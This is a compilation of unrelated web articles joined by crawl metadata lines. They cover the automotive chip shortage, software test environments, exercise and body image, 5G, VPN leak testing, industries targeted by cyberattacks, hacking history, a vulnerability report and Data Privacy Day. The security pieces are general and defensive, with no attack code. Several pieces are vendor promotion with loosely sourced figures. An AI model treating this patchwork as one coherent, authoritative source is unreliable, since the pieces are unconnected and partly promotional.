As cars have almost literally become smartphones on wheels, semiconductors have become increasingly critical for a variety of applications, from fuel-pressure sensors, to digital speedometers and artificial intelligence-driven tools that assist with parking, finding the next fuel station, or alerting the driver when an oil change is needed. Without these tiny silicon wafers, the auto industry’s post-pandemic recovery has stalled, as manufacturers are unable to complete orders. By some estimates, the impact on global production volumes is expected to be about 7-to-8 million units, and McKinsey reports that major carmakers have already announced significant rollbacks in their production due to chip shortages, lowering expected revenue for 2021 by billions of dollars.
Where did all the chips go?
The trouble began in the early months of the COVID-19 pandemic, when auto sales plummeted as much as 80% in Europe, 70% in China and nearly 50% in the U.S. The lack of demand for new cars caused factories to close, workers to be sent home and orders for parts and components – such as semiconductors – to be cancelled. This may have been shortsighted. Tech Republic reports that when automotive OEMs shut down, cancelling orders, they left disgruntled chip suppliers holding inventory and excess capacity. At the same time, some sectors needed more semiconductors to meet exploding demand from housebound consumers and remote workers. Sales spiked for PCs, tablets and consumer electronics, as students and workers set up workstations at home and people consumed more streaming media. Those manufacturers were happy to snap up the chip inventory. Now, they aren’t letting go.
Who is hurt by the chip shortage?
The impact is far reaching, beyond just frustrated car shoppers. When factories close, jobs are lost, crippling the economy. Industry Week reports on the political ramifications, saying, “The chip shortage due to manufacturing snags has had a massive impact on the U.S. economy, hindering auto production and driving prices higher.” The White House has held meetings with U.S. semiconductor industry executives and European leaders to try to ease the current chip crunch and work on longer term solutions.
Changes are being put into action. UK’s Fleetnews says, “The sector is clearly navigating through a period of disruption. Overall, given the chip shortage, automakers are increasingly compelled to learn from the current situation to adapt and tackle the future in a more efficient manner.”
Some OEMs are taking matters into their own hands, trying to develop their own microprocessors and even software. While this may mean more control, many experts consider this economically impractical, as automotive chips are typically low-value, commoditized items. Investing in building foundries, a high-cost endeavor, would take decades to break even.
An exception is Tesla, reports Industry Week. It has designed the microchip for its Full Self-Drive system, producing the chip too. The investment may be paying off. In the second quarter, the carmaker delivered a record number of vehicles and topped $1 billion of net profit for the first time.
The European Union wants to get into the chip business
It was recently announced that the European Union is planning to address the issue through legislation, hoping to create “tech sovereignty” in the face of the ongoing shortage.
“Digital is the make-or-break issue,” EU chief Ursula von der Leyen told the European Parliament in her annual State of the European Union address. EU countries plan to spend collectively more than 160 billion euros ($190 billion) to boost that sector in coming years – some 20% of the bloc’s 800-billion-euro COVID recovery fund.
The EU wants to be the source of 20% of the world’s semiconductor production by the end of the decade, according to a roadmap presented in March by the European Commission.
What can be done for short-term relief of the chip shortage?
Gartner suggests that automotive companies remain vigilant, continuing to negotiate with chip suppliers. “Since the current chip shortage is a dynamic situation, it is essential to understand how it changes on a continuous basis. Tracking leading indicators, such as capital investments, inventory indices and semiconductor industry revenue growth projections as an early indicator of inventory situations, can help organizations stay updated on the issue and see how the overall industry is growing,” said Gaurav Gupta, research vice president at Gartner.
How can we respond to the chip shortage in the longer term?
Technology can help overcome the complex challenges:
Data Insights. Manufacturers can look to technology to help them leverage data and make sense of the economic indicators. Analytics will be an important weapon in this battle but must be applied strategically – projecting likely outcomes, as well as understanding historical influences.
Extend supply chain visibility. The importance of supply chain visibility is crystal clear. And visibility must extend beyond just tier one suppliers, all the way down through the layers of the entire supply network. Using secondary options, though, such as small cargo ships, adds some reliability concerns, complicating issues on another front. This is likely to be a long-term effort with some trial and error. Drilling down into this detail is the only way to obtain a true picture of potential bottlenecks and risks.
Maintain supply chain flexibility and mitigate risk. It isn’t enough to observe potential trouble spots. Companies must also be able to take action, reassigning orders or re-mapping shipping routes, as needed, to keep inventory moving, routed to the most optimal location. Platforms that link trading partners via common processes and shared data can provide enhanced sense-and-respond capabilities, thereby significantly reducing risk.
Collaborative innovation. Changing product design specifications may be able to help ease some inventory gaps. Procuring consumer-grade chips with more capacity (and higher costs) may turn lower priority automotive accounts into ones that receive more attention from semiconductor producers.
Infor customer SEG Automotive turns to technology to manage complexity
Some tech-savvy companies are already applying technology to improve a wide variety of operational objectives, including supply chain planning. Global automotive supplier SEG Automotive, for example, relies on Infor CloudSuite Automotive to address today’s many market challenges. As a leading global supplier of drive components, SEG Automotive is in the center of today’s fast-changing trends. Infor’s multi-tenant cloud platform helps SEG respond with speed and agility. As cars have become more high-tech, SEG Automotive has kept pace, also taking advantage of sensors and AI technology in its product design and earning recognition as a technological pioneer. This transformation requires lean processes that support innovation and product development.
"We can improve not only our workflow management but also utilize modern methods in digital manufacturing and machine learning," says Tim Zimmermann, ERP Director, SEG Automotive. "This allows us to raise both production optimization and automated monitoring of our production to a new level."
SEG Automotive has launched several Industry 4.0 technologies to optimize the use of data, connectivity, and robotics. CloudSuite Automotive supports these modern processes. The solution enables the standardization of digital business processes, improves end-to-end visibility, and helps the organization apply integrated business planning and AI-driven business insights, especially important during this semiconductor shortage.
Digital networking with all business partners and the provision of data in a centralized data lake will lead to faster and more efficient decision-making and easier reporting in the future. A central view of all company data means that industry 4.0 and machine learning initiatives can be implemented strategically.
SEG Automotive is an example of an enterprise that is putting technology in place to help it address modern complexity. As the chip shortage – and other challenges – unfold, SEG Automotive and other manufacturers using advanced cloud solutions will be better equipped to respond with agility and intelligence. Modern tools won’t solve all supply chain challenges, but they have proven to put companies in a better position moving forward. | <urn:uuid:45e6a25e-2571-4d50-b9cf-3b3745581da4> | CC-MAIN-2022-40 | https://diginomica.com/global-microchip-shortage-automotive-industry-reinforces-need-better-supply-chain-planning | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00088.warc.gz | en | 0.941287 | 1,796 | 2.796875 | 3 |
A software testing environment allows developers and quality assurance teams to evaluate new or updated software in configured environments that test specific application components. Testing environments are similar but different from staging environments. However, both are considered under the umbrella of environment testing.
Developers identify issues or vulnerabilities during environment testing before deployment to the live environment. The environments used refine the final product before deployment and help ensure the launch or update’s success, which can impact the organization.
What is Environment Testing?
Developers can spin up a new environment on-demand to evaluate an application, either before it’s launched or before an update is deployed.
This process creates new sandbox environments unaffected by other developers’ tests and disconnected from the live environment. Sandbox environment testing has become increasingly popular as apps and systems rely on dependencies and third-party services, such as AWS or Azure. These dependencies can be included in environment testing.
Test environments are configured based on the needs of the application being tested, specifically the needs of its components. For example, suppose a developer is testing a web app. In that case, the test environment will mimic the same tech stack used by the live environment, including server-side and front-end technologies.
Testing Environments vs. Staging Environments
It’s common to have both a testing environment and a staging environment; at first glance, they seem the same. However, they’re both necessary and have important differences.
A sandbox for testing is configured based on the needs of the components or code being tested. This can often imitate the live environment, but the configuration can also vary based on the component’s needs.
A staging environment replicates the application’s current or future live environment precisely. While a testing environment tests specific code or components, a staging environment tests the whole application from end-to-end.
The Importance of Environment Testing
Environment testing aims to uncover bugs, vulnerabilities, or performance issues before the application is fully deployed. Additionally, test environments allow for incremental testing to identify problems before further development takes place.
It’s vital to test applications rigorously before deployment to uncover any issues that can significantly impact the business.
Essential Components of a Test Environment
Configuring a test environment involves several key components. These components include:
- The front-end environment
- The database server
- The operating system, including server operating systems
- A browser
- Networking software (and potentially hardware)
- Test data
- Documentation, user manuals, installation guides
- The system or application being tested
Including each of these components and setting them up properly is crucial to the environment’s functionality. For example, failing to configure the database server properly can waste time testing the app when the issue is actually with the environment itself.
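As a minimal illustration of the provision/seed/verify/teardown cycle, the sketch below builds a disposable sandbox using only the Python standard library: a temporary directory standing in for the environment and an SQLite file standing in for the database server, seeded with test data. A real test environment would add the other components listed above (operating system, browser, networking), but the lifecycle is the same; all names and data here are illustrative.

```python
import os
import shutil
import sqlite3
import tempfile

def provision_test_env():
    """Create an isolated sandbox: a temp directory plus a seeded database."""
    workdir = tempfile.mkdtemp(prefix="test-env-")
    conn = sqlite3.connect(os.path.join(workdir, "app.db"))
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("alice",), ("bob",)])
    conn.commit()
    return workdir, conn

def teardown_test_env(workdir, conn):
    """Destroy the sandbox so it cannot affect any other test run."""
    conn.close()
    shutil.rmtree(workdir)

workdir, conn = provision_test_env()
try:
    # The "test": verify the component under test sees the seeded data.
    rows = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
    print("seeded rows:", rows)  # seeded rows: 2
finally:
    teardown_test_env(workdir, conn)
```

Because the sandbox is created fresh and destroyed every time, two developers running this in parallel can never interfere with each other's results.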
A common challenge of both testing and staging environments is the resources they consume. They can unnecessarily use network and system resources when improperly configured or left up when no longer needed. As a result, companies have started to turn to companies that offer test environment as a service to help address this challenge and better utilize company resources.
Benefits of an Automated Testing Environment
Testing environments can embrace automation to streamline the entire process and eliminate the possibility of a developer misconfiguring one of the components. An automated testing environment is configured once by an engineer or developer, and is then available to spin up on-demand by anyone who needs it.
Automated test environments will always be deployed exactly the same, regardless of who deploys them or when they’re used. Additionally, multiple testing environments can be preconfigured to test different applications or different components of an application.
Leveraging a third-party platform with pre-built testing templates that you can modify to fit your needs can significantly reduce the time and resources necessary to create these vital testing areas. All making it easy for developers to deploy as needed and test components or applications to prevent issues from being included in the live version. | <urn:uuid:06f44247-52f8-4f03-9122-ca4a7edb5d17> | CC-MAIN-2022-40 | https://www.cloudshare.com/virtual-it-labs-glossary/environment-testing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00088.warc.gz | en | 0.92805 | 817 | 2.953125 | 3 |
New research suggests that a single session of physical exercise can make us feel stronger, thinner, and happier.
According to 2013 reports, only 11 percent of adult U.S. women over the age of 45 are satisfied with the appearance of their body. Body image dissatisfaction is a major risk factor for eating disorders and other types of unhealthy behavior.
Body image dissatisfaction mainly affects women. However, some studies have shown that "normative discontent," a widespread unhappiness with how one's body looks that results from societal beauty norms, affects both men and women to a comparable extent.
30 minutes of exercise
Kathleen Martin Ginis, a professor at UBC Okanagan, compared the physical self-perceptions and body images of women who exercised moderately for 30 minutes. The research involved 60 young women, with an average age of 19 years, who already had body image concerns and engaged in physical activity regularly.
The women were randomly assigned to either do 30 minutes of moderate-to-vigorous exercise or engage in quiet reading while sitting.
The researchers evaluated the women’s state body image, which is how one feels about one’s body at a specific moment in time.
The women who worked out improved their body image significantly compared with those who did not exercise. The effect appeared almost immediately and lasted for at least 20 minutes after exercise.
Affect and physical self-efficacy did not change significantly. Instead, it was the self-perceptions of body fat and strength that improved considerably after the exercise.
Prof. Ginis emphasizes that exercise interventions are an effective way to boost psychological well-being.
The study shows one way to feel better is to get going and exercise. The effects can be immediate.
More information: [ScienceDirect] | <urn:uuid:e148e073-5871-4b51-837c-f0365abf161e> | CC-MAIN-2022-40 | https://areflect.com/2017/06/19/research-suggests-physical-exercise-makes-women-feel-stronger-and-thinner/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00288.warc.gz | en | 0.948659 | 367 | 2.765625 | 3 |
By Steve McCaskill
The GSMA says it wants to “reset” the discussion surrounding 5G development and how such networks should be defined, but says there is plenty of life left in 4G, which is providing a boost to European mobile operators and the wider economy.
A number of different projects around the world are working on the development of 5G networks, including the 5G Innovation Centre (5GIC) at the University of Surrey, but many different technologies have been labeled “5G,” creating confusion.
The GSMA, which represents the mobile industry, hopes its intervention will influence development and the standardization of the technology, so potential applications can be identified and regulatory frameworks, such as spectrum allocation, can be formulated.
5G ‘Day Zero’
“Already being widely discussed, the arrival of 5G will help deliver a fresh wave of mobile innovation that will further transform the lives of individuals, businesses and societies around the world,” says Anne Bouverot, Director General, GSMA. “Of course, 5G is still to be standardized by the industry and it has not been fully agreed what 5G will look like or what it will enable.
“However, the GSMA is already collaborating with operators, vendors, governments and other industry organizations in ensuring that the future 5G standard is both technically and economically viable.”
Its report Understanding 5G: Perspectives on Future Technological Advancements in Mobile identifies two competing definitions of 5G—the “hyper-connected vision” view and the “next generation radio access technology” definition.
The first definition describes 5G as a combination of existing cellular and wireless technology to improve coverage and availability through the creation of a dense network that can support M2M. The GSMA says this is more of an evolution of existing technology whereas the second perspective outlined is more representative of a true generational shift with specific technical features.
Both definitions identify a set of core technical requirements—including speed, latency, network densification, coverage, availability, operational expenditure reduction and field life of devices—but in the GSMA’s eyes only the first two relate to a true generational shift, as the others are economic considerations or can be applied to other types of wireless technology.
The 5GIC claims the true defining feature of 5G will not be speed (although it says 800Gbps is possible in an extremely dense network environment) but rather the impression of “infinite capacity.” The GSMA expects 5G networks to offer speeds of at least 1Gbps and sub-1 millisecond latency, and only applications that require at least one of those features can be considered a true use case.
These include virtual reality or augmented reality gaming, wearable and health apps, connected cars and wireless cloud office applications, but many more potential apps have not yet been identified and will only become apparent as 5G nears commercialization.
“Our new report aims to reset the discussion on 5G, drawing the distinction between a true generational shift versus the on-going evolution of existing technologies that are already delivering a next-generation mobile experience,” adds Bouverot. “The GSMA will support the industry to continue to innovate and grow, working in close collaboration with our members, the wider mobile ecosystem, governments and other industry organizations to deliver a digital future for all.”
However, the GSMA says mobile operators immediate focus will be on the ongoing rollout of 4G, predicting that $1.7 trillion will be spent on network investment by 2020—most of it on 4G. Just five percent of all mobile connections are LTE at present, but this is expected to increase dramatically. Indeed, the GSMA recently told TechWeekEurope about its efforts to secure more spectrum for 3G and 4G services in a bid to support the world’s growing appetite for data.
This rollout is already having an impact on Europe, and 4G will account for half of all connections on the continent by the end of the decade. The GSMA says this will help mobile operators suffering from competitive, highly regulated and economically sensitive markets and slowing revenues from legacy services.
The GSMA says it wants to work with the new European Parliament to improve the environment for operators even further, arguing that 4G deployments are aiding the economy. The body says the mobile industry contributed 3.1 percent of Europe’s GDP in 2013, equivalent to €433 billion and is expected to reach €492 billion in total economic value by 2020.
“There are encouraging signs that Europe’s mobile industry is beginning to recover as both operators and consumers begin to see the benefit from the billions of euros of investment in 4G networks over the last few years,” continued Bouverot.
“Ongoing investment in networks and services, and particularly extending network coverage, will be vital in supporting Europe’s economic recovery and in delivering the world-class connectivity needed to prosper in an increasingly digital global economy. Europe’s operators must have the commercial freedom to develop new business models, innovate at the network and service levels, and offer customized services that can attract investment and drive innovation and competition in the global marketplace.” | <urn:uuid:e2d0b556-f03f-4e48-affb-bd084884bd13> | CC-MAIN-2022-40 | https://www.eweek.com/networking/gsma-5g-will-be-at-least-1g-bps-and-offer-low-latency/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00288.warc.gz | en | 0.929622 | 1,078 | 2.609375 | 3 |
VPNs have become much more popular as a way for people to keep their data secure in an increasingly insecure world. As the technology has grown in prevalence, a number of different types of VPNs have come to market, which has increased the chances of vulnerability.
If you are using a VPN, it’s important to check your VPN performance regularly by performing VPN leak tests.
Types of VPN Leaks
DNS acts as a connector between the internet and a user. When a user enters a URL into the browser, the browser contacts the device's configured DNS server and asks for the IP address of that site or webpage. Without a DNS server, the searched webpage can't be displayed to the user.

The DNS server stores the IP addresses of websites and provides them to the browser, since network routing works on numeric IP addresses rather than human-readable URLs.

The ISP's DNS server is the default setting on most devices, and through this channel your ISP can see all of your browsing activity. DNS leaks occur when a user connects to a VPN to hide their browsing history. Normally, the VPN automatically replaces the ISP DNS with the anonymous VPN DNS. In a DNS leak, however, the DNS request bypasses the VPN and goes to the ISP's DNS server.
An IP leak occurs when a user’s real IP address is exposed when a VPN is connected to hide it. There could be many reasons for IP leaks, including vulnerabilities in operating systems, browser plugins or web browsing software.
Torrent IP leak
As implied by the name, this leak occurs while torrenting. Torrent activities are also anonymized and encrypted when a user is connected to a VPN. Sometimes, however, the torrent client reveals the user's real IP address. A torrent IP leak only occurs while torrenting, due to settings issues such as enabled DHT and PEX features or the split tunneling feature of the VPN.
When split tunneling is enabled, some of the internet traffic—including the torrent traffic— is unencrypted, exposing the IP address.
WebRTC, or web real-time communication, is a feature in many browsers that provides browser-to-browser real-time communication, video and voice calling, P2P file sharing and other tasks without the need of any third-party software.
With a little effort, WebRTC can be used to reveal the user's real IP address while the VPN is connected. WebRTC communications occur through internet-based servers known as STUN (Session Traversal Utilities for NAT) servers. With the help of a STUN server, your computer and other internal network devices can discover their public IP addresses. STUN servers are also used by a VPN service to translate the internal network address to the public IP address and vice versa. To carry out this process, the STUN server keeps a record of both the VPN-based IP address and the local IP address of the connected user.
WebRTC leak is not an issue with the VPN. Rather, it is the vulnerability of the browser. When the STUN server queries are accepted by a browser’s WebRTC, the response is sent back to the STUN server. This response reflects both the public and private IP address and other information.
How to Avoid VPN Data Leaks
You can easily get rid of these privacy vulnerabilities by following some privacy measures. But before that, you need to determine whether your VPN is working. There are some tests through which you can spot a leak or vulnerability in your VPN.
Detecting VPN Leaks
First, disconnect your VPN, go to Google and enter “What is my IP.” You will get your real IP address in the search result, and you should remember your IP so that you can analyze your VPN performance. Now, you must check every data leak individually.
DNS Leak Test
To perform a DNS leak test, you should use a legitimate DNS test tool that is not affiliated with a VPN provider and doesn't have its own VPN service. Affiliated tools could mislead you with confusing results.
- Connect your VPN and go to the DNS test tool.
- Run the test and wait for the results.
- Now, analyze the results. If the DNS results match your real IP details, then your VPN might be leaking DNS.
If you find the DNS leak, there are two ways to fix it.
- You can manually change your DNS settings form ISP DNS to any third-party DNS server. GoogleDNS and OpenDNS are the two popular DNS servers.
- Use a VPN with a DNS leak prevention feature. This feature continuously monitors the DNS requests and prevent DNS leak.
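On Linux systems, a quick complementary check is to look at which DNS servers the operating system is actually configured to use, for example by inspecting resolv.conf. Below is a small sketch of parsing that file's format; the addresses are made-up sample values, and with the VPN connected you would expect to see your VPN provider's DNS servers listed rather than your ISP's.

```python
def nameservers(resolv_conf_text):
    """Extract DNS server addresses from resolv.conf-style text."""
    servers = []
    for line in resolv_conf_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers

# Sample content; on a real system, read it from /etc/resolv.conf.
sample = """\
# Generated by the VPN client
nameserver 10.8.0.1
nameserver 10.8.0.2
"""
print(nameservers(sample))  # ['10.8.0.1', '10.8.0.2']
```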
Torrent IP Test
- Open any torrent test tool.
- Click “Load Torrent File.”
- Then click “Magnet Link” and open the file in your torrent client. (If you don’t have any torrent file, then download one before testing torrent IP leak).
- When the downloading starts, check the test page to see which IP is displayed in the right-side box.
- Analyze the results. If the IPs are the same, then your torrent IP is not revealing your real IP.
There are three ways to prevent torrent IP leak:
- Use a VPN with kill switch feature. This feature is specially designed for torrenters to prevent IP leaks should the VPN connection drop.
- Bind IP with your torrent client. You can find the IP binding method by searching the name of your torrent client.
- Some third-party software such as VPNWatcher, VPNCheck or VPNNetMon can work as a kill switch by automatically disconnecting the internet when the VPN connection is disconnected.
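The core rule behind a kill switch can be sketched in a few lines: if the VPN tunnel interface disappears from the list of active network interfaces, traffic (such as a torrent client) should be blocked until the tunnel returns. The interface name "tun0" is an assumption; many, but not all, VPN clients create a tunnel interface with that name.

```python
VPN_INTERFACE = "tun0"  # assumed name of the VPN tunnel interface

def should_block_traffic(active_interfaces, vpn_interface=VPN_INTERFACE):
    """Kill-switch rule: block traffic whenever the VPN tunnel is down."""
    return vpn_interface not in active_interfaces

# VPN connected: traffic may flow.
print(should_block_traffic({"lo", "eth0", "tun0"}))  # False
# VPN connection dropped: engage the kill switch.
print(should_block_traffic({"lo", "eth0"}))          # True
```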
WebRTC Leak Test
- Open any WebRTC test tool.
- Click “Execute Test” and wait for the results.
- If the displayed IP is similar to your ISP's IP, then your identity is being exposed through a WebRTC leak.
You can prevent WebRTC leaks by manually disabling WebRTC or by downloading an extension for WebRTC leak prevention. However, setting changes are only available in Mozilla Firefox. A browser add-on is available for other web browsers including Chrome, Opera and Yandex.
•Zehra Ali is a tech journalist specialising in the infosec sector. This article originally appeared on Security Boulevard | <urn:uuid:a7d2a2b3-42bc-42c9-b68e-229d6052c306> | CC-MAIN-2022-40 | https://news.networktigers.com/cybersecurity-news/how-to-understand-and-prevent-vpn-leaks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00288.warc.gz | en | 0.914187 | 1,368 | 2.71875 | 3 |
However, cybercriminals target some industries at disproportionately high rates. Here are four of them:
Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.
The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.
That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.
There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.
Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn't hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. In one instance, a breach at North Carolina-based Atrium Health potentially exposed the data of 2.65 million people.
Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.
Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.
Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.
The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.
The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.
People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.
The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.
There's an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That's a practical way to address cybercrime risks, but it's an approach that'll likely become increasingly harder to choose. That's because there's already a gigantic cybersecurity skills gap, with hundreds of thousands of open positions, and forecasts say the shortage will get worse.
Any sector that uses the internet to conduct business could become a cybercriminal’s target.
Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.
Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re
(Security Affairs – Cybersecurity, cyberattacks) | <urn:uuid:0bf88e93-a994-42ec-a072-f6b0af88b88d> | CC-MAIN-2022-40 | https://securityaffairs.co/wordpress/78667/security/4-industries-cyberattacks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00288.warc.gz | en | 0.942913 | 941 | 2.5625 | 3 |
Are We Doomed to Repeat the Past When It Comes to Hacking?
On an almost weekly basis, another organization or government agency owns up to having been "hacked" – admitting that its systems have been breached. For every company that discloses an issue, there are likely 20 – 30 more that keep it under wraps. We know this because more than half of all U.S. businesses have been hacked. The attacker may have removed sensitive personal data or trade secrets for later sale on the dark web, or sought to disrupt operations, causing negative reputational and financial impact. But regardless of attacker motivation, cybercrime is predicted to cost the world $6 trillion in damages annually by 2021.
George Santayana gave us the great quote, “Those who cannot remember the past are condemned to repeat it.” Unfortunately, we haven’t been particularly good students of history – at least in terms of protecting our critical infrastructure from hackers.
An instructive precedent from the old world
During the 1790’s, France built what could be considered the first national data network – a mechanical telegraph system, reserved for government use, and comprised of a chain of towers with a system of moveable wooden arms. These arms were configured to correspond to letters, numbers and other characters.
Operators would view an adjacent tower through a telescope and match its configuration, allowing messages to be relayed faster than mail. The first network attack occurred when a telegraph operator in Tours, France, was bribed by bankers Francois and Joseph Blanc in 1834. He introduced errors into government messages, surreptitiously indicating the previous day's market movement. This scheme allowed the brothers to profit from their knowledge ahead of others.
Computer nerds rule
The minutes of a 1955 meeting of MIT's Tech Model Railroad Club state: "Mr. Eccles requests that anyone working or hacking on the electrical system turn the power off to avoid fuse blowing." Since then, a hack has been associated with a type of shortcut, or a way to rework the operation of a system. The Club members then moved to apply their engineering know-how to the new computers on campus (IBM 704's). Many of these students and other early hackers were programmers who wanted to optimize, customize and/or just learn. The most elegant hack from the late 1960's was that of Thompson and Ritchie, who worked on a "little used PDP-7 in a corner of Bell Labs" and developed what became the UNIX operating system.
Phones can be hacked, too
In the 1970s, phone hackers also known as “phreakers” exploited operational characteristics of the newly all-electronic telephone switching system to make long-distance calls free of charge. One of the hacks was the use of a toy whistle found in Cap’n Crunch cereal boxes that produced the 2600 hertz tone which fooled the network. Apple founders Steve Jobs and Steve Wozniak were phreakers who built blue boxes with digital circuits emulating network tones before they went on to found their wildly successful company.
Hacking gains a place in popular culture and law
In 1981, IBM introduced "personal computers" as standalone machines complete with CPU, software, memory, and storage. The wider availability of PCs led to an uptick in hacking, helped along by the movie "War Games." The film follows a young hacker who changes his grades after breaking into his school district's computer. He winds up finding a backdoor to a military supercomputer and runs a nuclear war simulation, thinking it's a computer game, and almost starts World War III. During this era, a different strain of hackers more focused on pirating code, breaking into systems, and stealing data came to the fore. Congress responded in 1986 with the Computer Fraud and Abuse Act, intended to reduce the hacking of government or other sensitive institutional computer systems, with punishment ranging from fines to imprisonment. Several high-profile hackers were prosecuted in the 1990's for crimes including stealing proprietary software from corporations, launching the first computer worm, and leading the first digital bank heist.
It’s the Wild West all over again
Since then, the practice of hacking continues to thrive in our worldwide ecosystem of connected networks, virtual machines, embedded systems, smart devices, and cloud computing. The data breaches at Yahoo!, Equifax, eBay, and Target, among other big names, are well known. What may be more alarming is the fact that, according to experts, cybercriminals made more than $1 billion from ransomware (a particularly nasty form of malware) in 2016. Consider the mayhem caused when hackers set their sights on government and critical infrastructure. Exhibit A is the digital extortion that brought down the city of Atlanta for days this past March. During the same month, the Department of Homeland Security and the FBI warned that Russian operatives had infiltrated the U.S. electric power grid. At a DefCon conference in Las Vegas earlier this month, an 11-year-old needed only ten minutes to hack into a replica of the Florida Secretary of State website used to report election results, and change them.
Critical infrastructure must assume hackers will get in
It’s time to learn from the both the long-ago and recent past: suppliers, manufacturers, and operators of critical infrastructure need to protect their organizations to maintain customer safety and loyalty, as well as business continuity. Vulnerabilities in software, large attack surfaces, and unverified supply chains are present in virtually all organizations.
One of the best ways to guard against the damage and disruption wrought by hackers is to transform software binaries within devices and systems in a way that denies malware the ability to change commands and spread. Known as "cyberhardening," this method prevents a single exploit from propagating across multiple systems. It shrinks attack surfaces, eliminates vulnerabilities, and stops malware from being executed.
This article was written by Lisa Silverman, VP of Marketing at RunSafe Security. She is an accomplished executive with broad experience in utilizing new technology to expand product portfolios and address customer needs. Lisa’s background includes product management, marketing, and strategic planning for both large enterprises and small businesses. | <urn:uuid:c9236e8d-cc1d-4891-b540-3780b8ced3c8> | CC-MAIN-2022-40 | https://www.iiot-world.com/ics-security/cybersecurity/are-we-doomed-to-repeat-the-past-when-it-come-to-hacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00288.warc.gz | en | 0.951803 | 1,309 | 2.953125 | 3 |
Most vulnerabilities exploited in the wild are years old and some could be remedied easily with a readily available patch.
This is one of the findings of a new report from security firm Edgescan, which states that two thirds (65 percent) of CVEs found in 2020 were more than three years old, while a third of those (32 percent) were originally identified in 2015 or earlier.
The oldest vulnerability in circulation last year was CVE-1999-0517, which was first identified at the turn of the millennium.
Most common malware-related vulnerabilities, the report further states, are between one and three years old, many of which could be fixed with an already available patch. Despite this fact, it takes businesses 84 days on average to patch high-risk vulnerabilities.
According to the report, PHP is "by far" the most insecure framework, accounting for almost a quarter (22.7 percent) of all critical risks found last year. Further, more than a tenth (13.4 percent) of all critical risks were linked to either unsupported, unpatched or outdated systems.
“We still see high rates of known (i.e. patchable) vulnerabilities which have working exploits in the wild, used by known nation states and cyber-criminal groups. So yes, patching and maintenance are still challenges, demonstrating that it is not trivial to patch production systems”, said Eoin Keary, CEO and founder of Edgescan.
Today—January 28th—is known as Data Privacy Day (or, in the European Union, Data Protection Day) in the United States, Canada, Israel, and the 47 EU countries in which it is observed.
Privacy—especially data privacy—is vital. Many national constitutions—in fact, over 150 of them—mention the “right to privacy.” It’s also been mentioned in the United Nations' Universal Declaration of Human Rights, and is protected under the European Convention on Human Rights. There have been a number of privacy regulations enacted in many countries, regions, and states, including the EU’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA).
The focus of Data Privacy Day is to raise awareness for businesses and consumers on the importance of protecting the privacy of users and their personal information. It’s meant to educate and encourage the development of tools for businesses and consumers to better manage and control user personal information. It’s also meant to drive increased or enhanced compliance with existing privacy laws and regulations, like GDPR and CCPA. Many international and national agencies, ministries, and councils, as well as educational institutions and industry consortiums, recognize Data Privacy Day as a time to commence or continue discussions on how to better protect the privacy of consumer and user data.
